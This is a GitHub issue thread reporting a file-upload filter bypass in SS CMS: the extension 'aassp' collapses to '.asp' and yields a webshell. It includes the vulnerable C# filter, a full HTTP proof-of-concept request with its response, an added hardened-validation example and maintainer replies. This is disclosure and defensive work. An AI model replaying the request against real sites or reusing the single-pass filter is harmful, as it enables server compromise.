siteserver / cms

SS CMS is based on .NET Core and lets you set up a fully featured, high-performance, large-scale and easy-to-maintain website platform at minimal cost, with minimal staffing and in the shortest possible time.
https://sscms.com
GNU Affero General Public License v3.0

There is a vulnerability where an attacker can upload a file that bypasses the filtering rule to get a shell. #1858

Closed diy0829 closed 5 years ago

diy0829 commented 5 years ago

After the administrator logs in and adds a new permitted file extension such as "aassp":

[image]

The administrator can upload a malicious file whose extension is "aassp". After the file name is filtered by the rule, the extension is changed to "*.asp". The file will then run as a webshell.

https://github.com/siteserver/cms/blob/dev/net452/SiteServer.CMS/Core/PathUtility.cs

```csharp
public static string GetUploadFileName(SiteInfo siteInfo, string filePath, bool isUploadChangeFileName)
{
    var retVal = isUploadChangeFileName
        ? $"{StringUtils.GetShortGuid(false)}{PathUtils.GetExtension(filePath)}"
        : PathUtils.GetFileName(filePath);

    // Single-pass substring removal: "aassp" collapses to "asp" here.
    retVal = StringUtils.ReplaceIgnoreCase(retVal, "as", string.Empty);
    retVal = StringUtils.ReplaceIgnoreCase(retVal, ";", string.Empty);
    return retVal;
}

public static string GetUploadSpecialName(SiteInfo siteInfo, string filePath, bool isUploadChangeFileName)
{
    var retVal = isUploadChangeFileName
        ? $"{StringUtils.GetShortGuid(false)}{PathUtils.GetExtension(filePath)}"
        : PathUtils.GetFileName(filePath);

    // Same filter as above, with the same collapsing behaviour.
    retVal = StringUtils.ReplaceIgnoreCase(retVal, "as", string.Empty);
    retVal = StringUtils.ReplaceIgnoreCase(retVal, ";", string.Empty);
    return retVal;
}
```

The filtering rule:

```csharp
retVal = StringUtils.ReplaceIgnoreCase(retVal, "as", string.Empty);
```

The rule is so simple that it just replaces "as".

And the suggestion is:

After the replacement, add a judgement to enhance the filter: if "as" is in the file extension, reject the upload.

POC:

```http
POST /siteserver/cms/modaluploadfile.aspx?PublishmentSystemID=1&uploadType=File&TextBoxClientID=FileUrl HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------1604917268667
Content-Length: 951

-----------------------------1604917268667
Content-Disposition: form-data; name="__EVENTTARGET"

btnSubmit
-----------------------------1604917268667
Content-Disposition: form-data; name="__EVENTARGUMENT"

-----------------------------1604917268667
Content-Disposition: form-data; name="__VIEWSTATE"

/wEPDwUJNjg4OTYyMzU3D2QWAgITD2QWAgIJDxBkDxYCZgIBFgIQBRvph4fnlKjns7vnu5/nlJ/miJDmlofku7blkI0FBFRydWVnEAUV6YeH55So5Y6f5pyJ5paH5Lu25ZCNBQVGYWxzZWdkZGRQ+LsLscytW1JgCPV76ln/lcczLM1kE1yuOcQDnYTmhQ==
-----------------------------1604917268667
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"

EAC6D450
-----------------------------1604917268667
Content-Disposition: form-data; name="hifUpload"; filename="1.aassp"
Content-Type: application/octet-stream

test

-----------------------------1604917268667
Content-Disposition: form-data; name="rblIsFileUploadChangeFileName"

True
-----------------------------1604917268667--
```

A part of the response:

```html
if (parent.document.getElementById('FileUrl') != null)
{
    parent.document.getElementById('FileUrl').value = '@/upload/files/2019/4/131348846.asp';
}
if (window.parent.closeWindow) window.parent.closeWindow();if (window.parent.layer) window.parent.layer.closeAll();
  </script>
```
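The fix this thread asks about, written up as an added example rather than SS CMS's own code: it reproduces the collapsing replace and then re-validates the extension of the name that would actually be stored. `UploadNameCheck`, `HardenedName`, the `ServerExecutable` list and the `.aassp` allowlist entry are constructed for the example, and `ReplaceIgnoreCase` is assumed to be a one-pass case-insensitive replace like the project's `StringUtils.ReplaceIgnoreCase`.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Text.RegularExpressions;

// Added example, not SS CMS code. Reproduces the collapsing "as" replace from
// PathUtility.cs and re-validates the extension of the name that is actually stored.
public static class UploadNameCheck
{
    // Stand-in for StringUtils.ReplaceIgnoreCase (assumed: one pass, case-insensitive).
    static string ReplaceIgnoreCase(string s, string find, string repl) =>
        Regex.Replace(s, Regex.Escape(find), repl, RegexOptions.IgnoreCase);

    // Behaviour reported in the issue: "1.aassp" comes back as "1.asp".
    public static string VulnerableName(string fileName)
    {
        var r = ReplaceIgnoreCase(fileName, "as", string.Empty);
        return ReplaceIgnoreCase(r, ";", string.Empty);
    }

    // Extensions the web server would execute; constructed list, extend it for your deployment.
    static readonly HashSet<string> ServerExecutable = new HashSet<string>
        { ".asp", ".aspx", ".ashx", ".asmx", ".asax", ".cshtml", ".vbhtml", ".config" };

    // Hardened variant: returns null when the upload must be rejected.
    // allowedExtensions holds lower-case entries with a leading dot, e.g. ".pdf".
    public static string HardenedName(string fileName, ISet<string> allowedExtensions, bool renameToGuid)
    {
        var name = Path.GetFileName(fileName ?? string.Empty);   // drop any directory part
        name = ReplaceIgnoreCase(name, "as", string.Empty);     // same rewriting as the original...
        name = ReplaceIgnoreCase(name, ";", string.Empty);
        var ext = Path.GetExtension(name).ToLowerInvariant();   // ...then check what is LEFT
        if (ext.Length < 2 || !allowedExtensions.Contains(ext))
            return null;   // ".asp" was never allowlisted, so the collapsed name is refused
        if (ServerExecutable.Contains(ext))
            return null;   // defence in depth: refuse even if an admin allowlisted it
        return renameToGuid ? Guid.NewGuid().ToString("N") + ext : name;
    }

    public static void Main()
    {
        // ".aassp" stands for the extension an administrator added, as in the report.
        var allowed = new HashSet<string> { ".jpg", ".pdf", ".aassp" };
        Console.WriteLine(VulnerableName("1.aassp"));
        Console.WriteLine(HardenedName("1.aassp", allowed, true) ?? "rejected");
        Console.WriteLine(HardenedName("report.pdf", allowed, false) ?? "rejected");
    }
}
```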
starlying commented 5 years ago

The details of the bug are very clear. We will fix it in the next version. Thanks for your help

NicoleG25 commented 4 years ago

@starlying was this issue ever addressed? And if so, could you point me to the fix? Thanks!

starlying commented 4 years ago

This issue is addressed; updating to the latest version will fix it.

NicoleG25 commented 4 years ago

@starlying in which commit was the issue fixed?

Thanks in advance :)